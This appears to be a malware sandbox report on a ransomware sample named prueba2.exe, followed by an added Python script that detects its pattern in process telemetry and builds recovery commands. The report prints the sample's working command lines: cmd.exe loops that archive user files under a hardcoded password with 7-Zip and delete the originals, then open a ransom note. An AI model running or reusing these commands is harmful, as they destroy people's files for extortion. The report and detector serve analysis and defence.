Analysis
- max time kernel: 107s
- max time network: 74s
- platform: windows7_x64
- resource: win7v200410
- submitted: 28-04-2020 01:36

Static task: static1

Behavioral task behavioral1
- Sample: prueba2.exe
- Resource: win7v200410 (windows7_x64)
- 0 signatures, 0 seconds

Behavioral task behavioral2
- Sample: prueba2.exe
- Resource: win10v200410 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: prueba2.exe
- Size: 329KB
- MD5: 9f5f9c71bb71b8e1571fc4d27721a99e
- SHA1: e64de07b46d896d25dc059dd774a140f109364c3
- SHA256: be3d67f3432d29b8339b324a0ee3150039da4cd7e95a3dcb564cca70f572603f
- SHA512: 6c5f031ef96f6fb930bb57c0cc1287f2f34d21475f2710f88341f955405e9cc37143a037939d5cd8387fe80f63ef9ad3ca7b70575d75dcfbca475bda9d941c16
- Score: 1/10
Malware Config
Signatures

- Suspicious use of WriteProcessMemory (21 IoCs)
  Processes: prueba2.exe
  Each of the seven cmd.exe children received three writes from the parent, which gives the 21 entries:

  description                       pid   process      target process
  PID 2040 wrote to memory of 1116  2040  prueba2.exe  cmd.exe  (3 IoCs)
  PID 2040 wrote to memory of 1004  2040  prueba2.exe  cmd.exe  (3 IoCs)
  PID 2040 wrote to memory of 1704  2040  prueba2.exe  cmd.exe  (3 IoCs)
  PID 2040 wrote to memory of 868   2040  prueba2.exe  cmd.exe  (3 IoCs)
  PID 2040 wrote to memory of 456   2040  prueba2.exe  cmd.exe  (3 IoCs)
  PID 2040 wrote to memory of 1800  2040  prueba2.exe  cmd.exe  (3 IoCs)
  PID 2040 wrote to memory of 1768  2040  prueba2.exe  cmd.exe  (3 IoCs)

  A parent writing into each child it has just created is what ordinary process creation looks like in this telemetry, so on its own the signature says only that prueba2.exe spawned seven cmd.exe processes; the command lines under Processes carry the actual behaviour.

- Suspicious use of AdjustPrivilegeToken (84 IoCs)
  Processes: 7z.exe
  Four IoCs per 7z.exe process and 21 such processes in the tree; the report lists the first 16. Every listed process enabled the same privileges in the same order: SeRestorePrivilege, privilege 35 (reported by LUID rather than name; 35 is SE_CREATE_SYMBOLIC_LINK_PRIVILEGE in winnt.h), SeSecurityPrivilege, SeSecurityPrivilege.

  pid   process
  316   7z.exe
  1128  7z.exe
  1316  7z.exe
  624   7z.exe
  1336  7z.exe
  1436  7z.exe
  1476  7z.exe
  1520  7z.exe
  1612  7z.exe
  1624  7z.exe
  1656  7z.exe
  1668  7z.exe
  1664  7z.exe
  1688  7z.exe
  792   7z.exe
  328   7z.exe

  7-Zip enables these privileges itself (it uses them for NTFS security data and symbolic links), so the signature is firing on a legitimate tool that the sample drives, not on injected code.

- Opens file in notepad (likely ransom note) (1 IoC)
  Processes: NOTEPAD.EXE

  pid   process
  1736  NOTEPAD.EXE
Processes

How to read the tree: the bracketed number is the depth the report records (1 is the submitted sample). Each entry gives the image path, then the command line as executed, then any signature the sandbox attached to that process. Every cmd.exe child runs one `for /r` loop over a user folder and, for each matching file, calls 7-Zip with `a` (add to archive), `-tzip` (zip container), `-mx0` (store only, no compression), `-sdel` (delete the source file once it is archived) and `-p23162` (the archive password, hardcoded in the command line). Most patterns in the loop are written without a dot (`*docx`, `*pdf`, `*xls`, ...), so they match any name ending in those characters, and `*mp3` appears twice; files such as StepMount.docm and BlockDebug.xlsm, which no pattern names, are most likely picked up because `*.doc` and `*.xls` also match their 8.3 short names. No 7z.exe child is recorded under the Music and Videos loops.

[1] C:\Users\Admin\AppData\Local\Temp\prueba2.exe
    "C:\Users\Admin\AppData\Local\Temp\prueba2.exe"
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Documents %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"

    [3] C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\Are.docx.geminis3" "C:\Users\Admin\Documents\Are.docx"
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\Files.docx.geminis3" "C:\Users\Admin\Documents\Files.docx"
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\Opened.docx.geminis3" "C:\Users\Admin\Documents\Opened.docx"
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\Recently.docx.geminis3" "C:\Users\Admin\Documents\Recently.docx"
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\StepMount.docm.geminis3" "C:\Users\Admin\Documents\StepMount.docm"
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\These.docx.geminis3" "C:\Users\Admin\Documents\These.docx"
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\UseAssert.docm.geminis3" "C:\Users\Admin\Documents\UseAssert.docm"
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\OutBackup.pdf.geminis3" "C:\Users\Admin\Documents\OutBackup.pdf"
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\BlockDebug.xlsm.geminis3" "C:\Users\Admin\Documents\BlockDebug.xlsm"
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\EnterMerge.xls.geminis3" "C:\Users\Admin\Documents\EnterMerge.xls"
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\MeasureApprove.xls.geminis3" "C:\Users\Admin\Documents\MeasureApprove.xls"
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\ConvertToEdit.pptx.geminis3" "C:\Users\Admin\Documents\ConvertToEdit.pptx"
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\NewMeasure.pptx.geminis3" "C:\Users\Admin\Documents\NewMeasure.pptx"
        - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Pictures %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"

    [3] C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Pictures\ConnectComplete.jpg.geminis3" "C:\Users\Admin\Pictures\ConnectComplete.jpg"
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Pictures\ConvertToSend.jpg.geminis3" "C:\Users\Admin\Pictures\ConvertToSend.jpg"
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Pictures\Wallpaper.jpg.geminis3" "C:\Users\Admin\Pictures\Wallpaper.jpg"
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Pictures\RegisterNew.png.geminis3" "C:\Users\Admin\Pictures\RegisterNew.png"

  [2] C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Downloads %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"

    [3] C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Downloads\ConvertToFormat.ppt.geminis3" "C:\Users\Admin\Downloads\ConvertToFormat.ppt"

    [3] C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Downloads\EnterSync.txt.geminis3" "C:\Users\Admin\Downloads\EnterSync.txt"

    [3] C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Downloads\StopOpen.rar.geminis3" "C:\Users\Admin\Downloads\StopOpen.rar"

  [2] C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Music %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"

  [2] C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Videos %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"

  [2] C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Desktop %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"

    [3] C:\PROGRA~1\7-ZIP\7z.exe
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Desktop\FormatUnlock.7z.geminis3" "C:\Users\Admin\Desktop\FormatUnlock.7z"

  [2] C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start README.txt

    [3] C:\Windows\system32\NOTEPAD.EXE
        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\README.txt
        - Opens file in notepad (likely ransom note)
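The process tree above is the whole attack: cmd.exe loops, 7-Zip archives each file under a password, deletes the original, and the password sits in every child's command line. The script below, an added example that is not part of the sandbox report or of the sample, runs that detection over process-creation records and turns the leaked key into per-file recovery commands. The record layout (pid, ppid, image, command line) is an assumed Sysmon-style shape, the sample records are constructed from the command lines in the report, and the assignment of cmd.exe PIDs to folders and of PIDs to the 7z.exe children is assumed for illustration.

```python
"""Triage the 7-Zip "archive, password, delete source" pattern from process telemetry.

Added example, not code from the sandbox report or the sample. Event layout is an
assumed Sysmon-style shape; command lines are constructed from the report; the
cmd.exe-to-folder and 7z.exe PID assignments are assumptions for illustration.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass(frozen=True)
class Finding:
    pid: int
    ppid: int
    password: str
    archive: str
    victim: str
    added_ext: str


TOKEN = re.compile(r'"([^"]*)"|(\S+)')  # double-quoted span | bare token
FOR_R_LOOP = re.compile(r"\bfor\s+/r\b", re.IGNORECASE)
SEVENZIP = r'"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162'
LOOP = (r"C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\{d} %d in (*.jpg *.doc *docx *pdf) "
        r'do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"')


def victim(pid: int, ppid: int, path: str) -> ProcEvent:
    """One 7z.exe child as the report shows it: the archive is the source path plus .geminis3."""
    return ProcEvent(pid, ppid, r"C:\PROGRA~1\7-ZIP\7z.exe", f'{SEVENZIP} "{path}.geminis3" "{path}"')


SAMPLE_EVENTS = [  # constructed from the report's process tree (abbreviated pattern list)
    ProcEvent(2040, 1000, r"C:\Users\Admin\AppData\Local\Temp\prueba2.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\prueba2.exe"'),
    ProcEvent(1116, 2040, r"C:\Windows\system32\cmd.exe", LOOP.format(d="Documents")),
    victim(316, 1116, r"C:\Users\Admin\Documents\Are.docx"),
    victim(1128, 1116, r"C:\Users\Admin\Documents\OutBackup.pdf"),
    ProcEvent(1004, 2040, r"C:\Windows\system32\cmd.exe", LOOP.format(d="Pictures")),
    victim(1316, 1004, r"C:\Users\Admin\Pictures\Wallpaper.jpg"),
    ProcEvent(1704, 2040, r"C:\Windows\system32\cmd.exe", LOOP.format(d="Downloads")),
    victim(624, 1704, r"C:\Users\Admin\Downloads\StopOpen.rar"),
    ProcEvent(1800, 2040, r"C:\Windows\system32\cmd.exe", LOOP.format(d="Desktop")),
    victim(1336, 1800, r"C:\Users\Admin\Desktop\FormatUnlock.7z"),
    # Constructed benign contrast: a password-protected backup that keeps its source files.
    ProcEvent(3000, 2900, r"C:\Program Files\7-Zip\7z.exe",
              r'"C:\Program Files\7-Zip\7z.exe" a -tzip -pHunter2 "D:\backup\docs.zip" "C:\Users\Admin\Documents"'),
]


def tokenize(cmdline: str) -> list[str]:
    """Split a Windows command line on whitespace, keeping double-quoted spans whole."""
    return [quoted or bare for quoted, bare in TOKEN.findall(cmdline)]


def analyze_7z(ev: ProcEvent) -> Finding | None:
    """Match `7z a ... -sdel -p<pw> <source><suffix> <source>` and pull out the leaked key."""
    toks = tokenize(ev.cmdline)
    if len(toks) < 4 or not toks[0].lower().endswith("7z.exe") or toks[1].lower() != "a":
        return None
    switches = [t for t in toks[2:] if t.startswith("-")]
    positional = [t for t in toks[2:] if not t.startswith("-")]
    if "-sdel" not in (s.lower() for s in switches) or len(positional) < 2:
        return None
    password = next((s[2:] for s in switches if s[:2].lower() == "-p" and len(s) > 2), None)
    if password is None:
        return None
    archive, source = positional[0], positional[1]
    # The tell: the archive name is the source name with a new suffix appended.
    if len(archive) <= len(source) or not archive.lower().startswith(source.lower()):
        return None
    return Finding(ev.pid, ev.ppid, password, archive, source, archive[len(source):])


def recovery_command(f: Finding) -> str:
    """The key is in every recorded 7z.exe command line, so recovery is a plain extraction."""
    out_dir = f.victim.rsplit("\\", 1)[0]
    return f'7z x -p{f.password} -o"{out_dir}" "{f.archive}"'


def triage(events: list[ProcEvent]) -> dict:
    """Summarise a telemetry batch: findings, leaked passwords, suffixes, driving loops, recovery."""
    by_pid = {e.pid: e for e in events}
    findings = [f for f in map(analyze_7z, events) if f is not None]
    loop_parents = sorted({f.ppid for f in findings
                           if f.ppid in by_pid and FOR_R_LOOP.search(by_pid[f.ppid].cmdline)})
    return {"findings": findings, "passwords": {f.password for f in findings},
            "extensions": {f.added_ext for f in findings}, "loop_parents": loop_parents,
            "recovery": [recovery_command(f) for f in findings]}


if __name__ == "__main__":
    result = triage(SAMPLE_EVENTS)
    print(f"{len(result['findings'])} files archived and deleted; passwords {result['passwords']}")
    print("\n".join(result["recovery"]))
```

Fed Sysmon Event ID 1 or Security 4688 records (with command-line auditing enabled) in the same shape, `triage` returns the affected files, the password set and the `for /r` parents that drove the loop, plus one `7z x` command per archive. The benign backup command is not flagged because it keeps its source files and does not rename them. Two caveats worth knowing: with `-tzip`, 7-Zip encrypts with ZipCrypto unless `-mem=AES256` is given, and `-mx0` stores each member uncompressed, so even if the password had not been in the command line the archives would be exposed to the known-plaintext attacks on ZipCrypto.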